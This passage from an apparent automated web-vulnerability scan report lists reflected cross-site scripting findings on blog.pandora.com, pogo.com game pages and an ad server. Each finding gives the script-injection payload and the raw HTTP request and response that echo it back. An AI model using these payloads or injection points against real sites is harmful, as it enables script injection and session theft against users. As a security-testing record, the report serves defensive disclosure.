User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js was not found on this server.</p>
...[SNIP]...

3.452. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/jquery.dimension.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)</script>64c6f95a91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f was not found on this server.</p>
...[SNIP]...

3.453. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)</script>9480ff2f53c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js was not found on this server.</p>
...[SNIP]...

3.454. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)</script>60fe94bbc36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 was not found on this server.</p>
...[SNIP]...

3.455. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/menuManager.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)</script>042e399b16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js was not found on this server.</p>
...[SNIP]...

3.456. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/menuManager.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)</script>10f75eed66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c was not found on this server.</p>
...[SNIP]...

3.457. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/styles-site.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)</script>3ef283336f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css was not found on this server.</p>
...[SNIP]...

3.458. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/styles-site.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)</script>d3e39760b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 was not found on this server.</p>
...[SNIP]...

3.459. http://blog.pandora.com/press [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/press

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)</script>7529f0abeb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press711ea<script>alert(1)</script>7529f0abeb0 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /press711ea<script>alert(1)</script>7529f0abeb0 was not found on this server.</p>
...[SNIP]...

3.460. http://blog.pandora.com/show [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/show

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)</script>eadbbafd7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /show98567<script>alert(1)</script>eadbbafd7b9 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /show98567<script>alert(1)</script>eadbbafd7b9 was not found on this server.</p>
...[SNIP]...

3.461. http://blog.pandora.com/show/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/show/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)</script>c76f8eb676e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /show33cf5<script>alert(1)</script>c76f8eb676e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /show33cf5<script>alert(1)</script>c76f8eb676e/ was not found on this server.</p>
...[SNIP]...

3.462. http://board-games.pogo.com/games/monopoly [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade82"><script>alert(1)</script>96953023051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /games/monopoly?ade82"><script>alert(1)</script>96953023051=1 HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=141F46734065D526FC7068C9FA1059C1.000227; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606630363997888; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:21 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 60921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://board-games.pogo.com/games/monopoly?ade82"><script>alert(1)</script>96953023051=1"/>
...[SNIP]...

3.463. http://board-games.pogo.com/games/online-chess [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/online-chess

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cb8"><script>alert(1)</script>7fe9a271473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1 HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=B465324E474800A4D062EFB7F1522026.000289; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606449975376737; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 55086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://board-games.pogo.com/games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1"/>
...[SNIP]...

3.464. http://board-games.pogo.com/games/risk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/risk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d31f"><script>alert(1)</script>879217c7909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /games/risk?6d31f"><script>alert(1)</script>879217c7909=1 HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=67C6D64D20A6AAB9E0CB97A6522E622A.000067; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606527284784901; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 58205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://board-games.pogo.com/games/risk?6d31f"><script>alert(1)</script>879217c7909=1"/>
...[SNIP]...

3.465. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345c3"%3balert(1)//496dcbce961 was submitted in the ifl parameter. This input was echoed as 345c3";alert(1)//496dcbce961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$345c3"%3balert(1)//496dcbce961&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4Ke09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=cbce66d2-55a3-4095-8c7c-70a9d0dd86c43G6020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=cbce66d2-55a3-4095-8c7c-70a9d0dd86c43G6020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:28 GMT
Connection: close
Content-Length: 1757

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
=30;ebO.au="Site-8299/Type-11/4288750_fdc729bf-3b37-4810-b295-12cab9a0e448.js";ebO.fvp="Res/";ebO.dlm=1;ebO.bt=5;ebO.bv=8.000000;ebO.plt=9;ebO.ut=gEbUT;ebO.oo=0;ebO.ifl="ads/eyeblaster/addineyev2.jsp$$345c3";alert(1)//496dcbce961&ncu=";ebO.pv="_3_0_3";ebBv="_4_5_6";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";var ebIfrm=(""=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc+">
...[SNIP]...

3.466. http://card-games.pogo.com/games/rainy-day-spider-solitaire [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
